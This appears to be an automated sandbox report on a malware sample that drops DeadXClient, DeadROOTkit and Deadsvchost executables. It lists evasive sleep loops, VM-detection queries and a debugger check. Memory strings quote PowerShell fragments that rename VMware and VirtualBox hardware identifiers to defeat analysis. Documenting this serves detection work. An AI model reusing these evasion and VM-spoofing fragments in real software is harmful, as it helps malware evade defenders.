Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9353
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\Public\DeadCodeRootKit.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\lsass.exe API coverage: 7.3 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.6 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.5 %
Source: C:\Windows\System32\svchost.exe API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\mIURiU8n2P.exe TID: 5164 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadXClient.exe TID: 7384 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadXClient.exe TID: 7396 Thread sleep count: 6514 > 30 Jump to behavior
Source: C:\Users\Public\DeadXClient.exe TID: 7396 Thread sleep count: 3143 > 30 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -36893488147419080s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599640s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599531s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599421s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599293s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599133s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598741s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598568s >= -30000s Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598440s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680 Thread sleep count: 3822 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680 Thread sleep count: 5329 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 7356 Thread sleep count: 340 > 30 Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 7356 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 6920 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep count: 8849 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep time: -8849000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep count: 1151 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep time: -1151000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7476 Thread sleep count: 9914 > 30
Source: C:\Windows\System32\lsass.exe TID: 7476 Thread sleep time: -9914000s >= -30000s
Source: C:\Users\Public\Deadsvchost.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7552 Thread sleep count: 241 > 30
Source: C:\Windows\System32\svchost.exe TID: 7552 Thread sleep time: -241000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7600 Thread sleep count: 9863 > 30
Source: C:\Windows\System32\dwm.exe TID: 7600 Thread sleep time: -9863000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7644 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7644 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7664 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 7664 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7680 Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 7680 Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep count: 201 > 30
Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep time: -201000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7776 Thread sleep count: 80 > 30
Source: C:\Windows\System32\svchost.exe TID: 7776 Thread sleep time: -80000s >= -30000s
Source: C:\Users\Public\Deadsvchost.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7796 Thread sleep count: 82 > 30
Source: C:\Windows\System32\svchost.exe TID: 7796 Thread sleep time: -82000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep count: 238 > 30
Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep time: -238000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7864 Thread sleep count: 69 > 30
Source: C:\Windows\System32\svchost.exe TID: 7864 Thread sleep time: -69000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7988 Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 7988 Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8004 Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 8004 Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8020 Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 8020 Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8104 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 8104 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8128 Thread sleep count: 62 > 30
Source: C:\Windows\System32\svchost.exe TID: 8128 Thread sleep time: -62000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8160 Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 8160 Thread sleep time: -250000s >= -30000s
Source: C:\Users\Public\Deadsvchost.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8180 Thread sleep count: 244 > 30
Source: C:\Windows\System32\svchost.exe TID: 8180 Thread sleep time: -244000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8188 Thread sleep count: 226 > 30
Source: C:\Windows\System32\svchost.exe TID: 8188 Thread sleep time: -226000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7264 Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 7264 Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7248 Thread sleep count: 237 > 30
Source: C:\Windows\System32\svchost.exe TID: 7248 Thread sleep time: -237000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7308 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7308 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6804 Thread sleep count: 52 > 30
Source: C:\Windows\System32\svchost.exe TID: 6804 Thread sleep time: -52000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep count: 53 > 30
Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep time: -53000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 6096 Thread sleep count: 185 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 6096 Thread sleep time: -185000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\Public\DeadROOTkit.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Users\Public\DeadXClient.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadXClient.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadXClient.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadXClient.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadXClient.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\Deadsvchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Deadsvchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Deadsvchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A09BF5C FindFirstFileExW, 6_2_000002E86A09BF5C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC64BF5C FindFirstFileExW, 11_2_00000225DC64BF5C
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AEBF5C FindFirstFileExW, 12_2_00000202C0AEBF5C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A66130BF5C FindFirstFileExW, 14_2_000002A66130BF5C
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF21BF5C FindFirstFileExW, 16_2_000002BAAF21BF5C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879CBF5C FindFirstFileExW, 17_2_0000026A879CBF5C
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537ABF5C FindFirstFileExW, 19_2_00000179537ABF5C
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D56BF5C FindFirstFileExW, 20_2_000002295D56BF5C
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599640 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599293 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599133 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598741 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598568 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598440 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000016.00000002.3003322071.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: DeadXClient.exe, 00000001.00000002.3027772809.000000001B950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpe="%SystemRoot%\system32\mswsock.dll Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 00000010.00000002.3015392657.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: svchost.exe, 00000019.00000003.1884989548.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000002E.00000000.1971368837.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: svchost.exe, 0000002E.00000000.1971007681.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.25.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B1C0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2947445090.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763056883.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2944371275.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1779615451.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1828161569.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2938538248.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1830040806.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2938017743.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1834191940.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2955372559.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000000E.00000000.1779646224.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.25.dr Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: DeadROOTkit.exe.2.dr Binary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000019.00000000.1856908849.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2952389964.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000002E.00000000.1971175317.000002644A640000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
Source: svchost.exe, 0000002E.00000000.1971007681.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000019.00000002.2953316253.000001D558643000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmcitpA
Source: svchost.exe, 0000000E.00000002.2949507615.000002A66066B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000024.00000002.2936162051.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000019.00000000.1858871917.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Microsoft-Windows-Ntfs%4Operational.evtx.25.dr Binary or memory string: VMware
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: DeadXClient.exe, 00000001.00000002.2920271280.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: dwm.exe, 00000010.00000002.3015392657.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\DeadROOTkit.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
